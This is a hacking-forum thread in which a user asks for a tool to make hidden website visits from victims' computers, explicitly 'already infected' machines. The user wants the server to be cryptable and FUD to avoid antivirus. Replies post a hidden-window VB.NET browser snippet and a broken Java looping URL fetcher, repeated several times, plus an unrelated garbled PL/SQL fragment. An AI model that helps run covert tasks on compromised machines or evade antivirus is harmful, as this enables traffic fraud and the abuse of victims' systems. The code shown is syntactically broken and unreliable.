• Earn real money by being active: Hello Guest, earn real money by simply being active on the forum — post quality content, get reactions, and help the community. Once you reach the minimum credit amount, you’ll be able to withdraw your balance directly. Learn how it works.

Hidden website visitor

Status
Not open for further replies.

cnupo

Leech
User
Joined
Nov 12, 2011
Messages
14
Reputation
0
Reaction score
131
Points
28
Credits
0
‎13 Years of Service‎
94%
Hi guys, need a software to make hidden visits from client's computer to a website, I tried few RATs, unfortunately in most of them that function does not work or opens a visible window in windows 7, 8 and 10. What program should I use? The server have to be cryptable and prefer with NO dependencies and with unicode support. Pls Help az:

 
Re: Hidden website visitor

Try this:

Add an WebBrowser in the load of form1

Code:
>Me.Visible = False
       Me.ShowInTaskbar = False
       Me.WebBrowser1.ScriptErrorsSuppressed = True
       WebBrowser1.Navigate("http://level23hacktools.com/forum/forum.php")

Download file:

[HIDE-THANKS]
This link is hidden for visitors. Please Log in or register now.
[/HIDE-THANKS]

Password:

level23hacktools.com

But is in .net !!
 
Re: Hidden website visitor

thank_you CABALLO _L23

 
Last edited by a moderator:
Re: Hidden website visitor

you can make it in visual basic, bach, powershell.... If you want i can code in autoit :)

 
Re: Hidden website visitor

Code:
>import java.io.*;
import java.net.*;


publica class CaballoHorse {
public static void main (String [] args){

//Don't use this code with for can damage your computer Hugs
for(;;;){
 try{
       URL url= new URL("http://level23hacktools.com/forum/forum.php");
       URLConnection connection = new URL(url).openConnection();
       BufferedReader rd = new BufferedReader(new InputStreamReader(connection.getInputStream()));
       String response = rd.readLine();
       rd.close();
   }catch (Exception e) {
      System.out.println("This is a f....ck exception, mistakes ..!)
   });}

}}

[img=https://sc.mogicons.com/s/thumbs-up-192.png]   [img=https://sc.mogicons.com/s/drinking-coffee-200.png]

Declare
v_reverse Varchar2:='Learning';
v_responsestring Varchar2();
Begin 
For i In Reverse 1..LENGHT(v_reverse) LOOP
v_responsestring:=SUBSTRING(v_responsestring,i,1);


END LOOP;
DBMS_OUTPUT.PUT_LINE('This is your reverse String '||v_responsestring) ;
DBMS_OUTPUT.PUT_LINE('Living and learning this is my life hugs brothers specialy to crypterhacker ') ;
Exception
When other then
Raise_application_Error(-20000,'I catch the f..ck mistake ');
END;
 
Last edited by a moderator:
Re: Hidden website visitor

you can make it in visual basic, bach, powershell.... If you want i can code in autoit :)
0b3y bro, autoit is a perfect language for my purposes, the easiest way to force client's computer to visit a website in a hidden window is to upload and execute .exe to already infected machine. I can change website url in the source in autoit with no problems. However, there is no new autoit version since September 2015, if the compiled code is not FUD alot of permanent AV detections will appear. I haven't seen good autoit crypter for more than a year ..

 
Re: Hidden website visitor

well, and why it has to raise an av exception? its not malware, just visiting a website in a hidding window...

 
Re: Hidden website visitor

Yes, in such a situation with no malware code everything will be perfect good:, would you pls code it for me, I still have no success with the other ways.

 
Please note, if you want to make a deal with this user, that it is blocked.
Re: Hidden website visitor

Code:
>import java.io.*;
import java.net.*;


publica class CaballoHorse {
public static void main (String [] args){

//Don't use this code with for can damage your computer Hugs
for(;;;){
 try{
       URL url= new URL("http://level23hacktools.com/forum/forum.php");
       URLConnection connection = new URL(url).openConnection();
       BufferedReader rd = new BufferedReader(new InputStreamReader(connection.getInputStream()));
       String response = rd.readLine();
       rd.close();
   }catch (Exception e) {
      System.out.println("This is a f....ck exception, mistakes ..!)
   });}

}}

[img=https://sc.mogicons.com/s/thumbs-up-192.png]   [img=https://sc.mogicons.com/s/drinking-coffee-200.png]

Declare
v_reverse Varchar2:='Learning';
v_responsestring Varchar2();
Begin 
For i In Reverse 1..LENGHT(v_reverse) LOOP
v_responsestring:=SUBSTRING(v_responsestring,i,1);


END LOOP;
DBMS_OUTPUT.PUT_LINE('This is your reverse String '||v_responsestring) ;
DBMS_OUTPUT.PUT_LINE('Living and learning this is my life hugs brothers specialy to crypterhacker ') ;
Exception
When other then
Raise_application_Error(-20000,'I catch the f..ck mistake ');
END;

wich language this and wich extention for it

 
Re: Hidden website visitor

The first code part it's java language as you can see in the imports and the second part start from declare this is pl/sql it's a prodecural language to manage functions, procedure, triggers on Database.

Code:
>
import java.io.*;
import java.net.*;


publica class CaballoHorse {
public static void main (String [] args){

//Don't use this code with for can damage your computer Hugs
for(;;;){
 try{
       URL url= new URL("http://level23hacktools.com/forum/forum.php");
       URLConnection connection = new URL(url).openConnection();
       BufferedReader rd = new BufferedReader(new InputStreamReader(connection.getInputStream()));
       String response = rd.readLine();
       rd.close();
   }catch (Exception e) {
      System.out.println("This is a f....ck exception, mistakes ..!)
   });}

}}
To complile you should install JVM , copy code and paste inside txt, save as my nameClass.java after that

you can open a cmd console and in the same Directory where it's your java Class type this commands.

javac nameClass.java

After that you should see something like this nameClass.class to run it java nameClass without .class

I recomended use an IDE as Netbeans or Eclipse ,that's all my friend...! remember delete for(;;;) because

create an unlimited loop;;

Thanks to read me

 
Last edited by a moderator:
Re: Hidden website visitor

Great tutorial r3spald0 good:

 
Status
Not open for further replies.
Back
Top